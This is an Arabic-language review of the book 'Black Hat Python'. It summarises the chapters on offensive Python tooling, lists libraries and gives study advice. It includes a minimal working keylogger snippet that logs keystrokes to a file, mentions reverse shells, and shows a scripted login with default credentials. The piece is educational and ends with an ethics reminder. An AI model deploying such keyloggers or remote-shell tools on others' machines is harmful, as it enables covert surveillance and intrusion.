؟ ليش Black Hat Python؟
🐍 Python هي لغة الأمن السيبراني
أكثر أدوات الاختراق مكتوبة بـ Python (sqlmap, scapy, requests, impacket). تعلّمها = تقدر تفهم وتبني أدواتك.
📚 لا يفترض خبرة عميقة
المؤلف Justin Seitz يقول بصراحة: "أنا لست expert في Python، أنا pentester أستخدمها بسرعة. هذا أسلوبي." يعني لو تعرف أساسيات Python، تقدر تتابع.
🎯 عملي 100%
كل فصل يبني أداة حقيقية تشتغل — مو تنظير. تتعلم بكتابة كود حقيقي.
📋 ما يغطيه الكتاب
الفصل 1: إعداد البيئة
تثبيت Python 3، مكتبات أساسية، Kali Linux setup.
الفصل 2: الشبكات الأساسية
بناء TCP Client/Server، استبدال Netcat بأداة Python خاصة.
الفصل 3: Raw Sockets & Sniffing
التقاط وتحليل حزم الشبكة يدوياً.
الفصل 4: استغلال HTTP
بناء مكتبة HTTP خاصة، التعامل مع proxies، web scraping.
الفصل 5: استخراج البيانات من الويب
BeautifulSoup, HTML parsing, IoT discovery (Shodan-like).
الفصل 6-8: اختراق Windows
Keyloggers، Screenshots، تنفيذ كود عن بعد، Privilege Escalation.
الفصل 9: استغلال Internet Explorer
دراسة حالة لاستغلال متصفح قديم (تاريخي لكن مفهوم).
الفصل 10: Immunity Debugger
أتمتة Reverse Engineering باستخدام debugger.
الفصل 11: Fuzzing
بناء fuzzer لاكتشاف ثغرات.
🛠️ أدوات حقيقية تبنيها
أداة Netcat مخصصة بـ Python
بديل لـ Netcat تدعم رفع/تنزيل الملفات، تنفيذ أوامر، reverse shells.
import socket # TCP Client بسيط client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) client.connect(("target.com", 9999)) client.send(b"GET / HTTP/1.0\r\n\r\n") response = client.recv(4096) print(response.decode())
Keylogger بسيط
يسجل كل ضغطة لوحة المفاتيح. يستخدم في penetration testing فقط بإذن.
from pynput.keyboard import Key, Listener def on_press(key): with open("log.txt", "a") as f: f.write(str(key)) with Listener(on_press=on_press) as l: l.join()
مكتبة HTTP للـ proxies
مثل Burp Suite لكن أنت تبنيها. للتعلم وفهم كيف proxies تعمل.
import requests # Session للاحتفاظ بـ cookies session = requests.Session() # POST login session.post("https://target.com/login", data={ "username": "admin", "password": "password" }) # الوصول لـ dashboard resp = session.get("https://target.com/dashboard") print(resp.text)
📦 مكتبات Python الأساسية للأمن
| المكتبة | الاستخدام |
|---|---|
| socket | الشبكات TCP/UDP الأساسية |
| requests | HTTP requests سهلة |
| scapy | معالجة حزم الشبكة المتقدمة |
| paramiko | SSH connections |
| impacket | بروتوكولات Windows (SMB, Kerberos) |
| BeautifulSoup | HTML/XML parsing |
| pynput | Keyboard/mouse monitoring |
| cryptography | التشفير الحديث |
| pexpect | أتمتة تطبيقات CLI |
| Pillow | معالجة الصور (Screenshots) |
💡 نصائح ذهبية من Justin Seitz
🎯 "أفكاركم أهم من الكود"
Justin يقول: ما يحب يحط أمثلة "مثالية". يحب يعطيك الفكرة + الحد الأدنى، ثم يترك لك تجرّب. هذا أسلوب التعلم الحقيقي.
⚡ "سرعة > كمال"
في الـ pentesting، تحتاج أداة تشتغل بسرعة وتؤدي الغرض. الكمال الجمالي مو ضروري. المهم النتيجة.
📝 "حل واجباتي"
كل فصل فيه "Homework" - أفكار لبناء أدوات جديدة. لو فعلتها، تتعلم أكثر من قراءة الكتاب مرتين.
🌐 "تعلّم GitHub"
كل أدواتك انشرها على GitHub. هذا يبني Portfolio قوي ويفتح لك فرص عمل.
⚖️ هل الكتاب ما زال صالحاً (2014)؟
✅ نقاط القوة
- • أساسيات الشبكات مع Python = لم تتغير
- • مكتبات مثل requests, scapy = لا تزال مستخدمة
- • فلسفة "ابني أدواتك" = أبدية
- • شرح الـ sockets = أساسي لكل pentester
⚠️ نقاط ضعف
- • يركز على Python 2 (قديم) - تحتاج تكييف لـ Python 3
- • فصول Windows XP قديمة - الأنظمة الحديثة مختلفة
- • IE 11 فصل تاريخي بحت
- • ما يغطي مكتبات حديثة مثل httpx, asyncio
💡 نصيحتي:
الكتاب يستحق القراءة للفلسفة والأفكار. لكن حضّر نفسك تكيّف الكود لـ Python 3 ومكتبات أحدث. لو أتقنت الكتاب، تعلّم Black Hat Python 2 (الإصدار الثاني المحدث).
⚖️ ملاحظة أخلاقية مهمة
الكتاب اسمه "Black Hat" لكنه موجّه للمتخصصين الأخلاقيين. المؤلف نفسه يعمل في Immunity (شركة اختبار اختراق). أي أداة تبنيها، استخدمها فقط على أنظمتك الخاصة أو بإذن كتابي.
Justin في مقدمته: "ما أبني أدوات للمهاجمين. أبني أدوات للمحترفين الذين يستخدمونها بحماية عملائهم."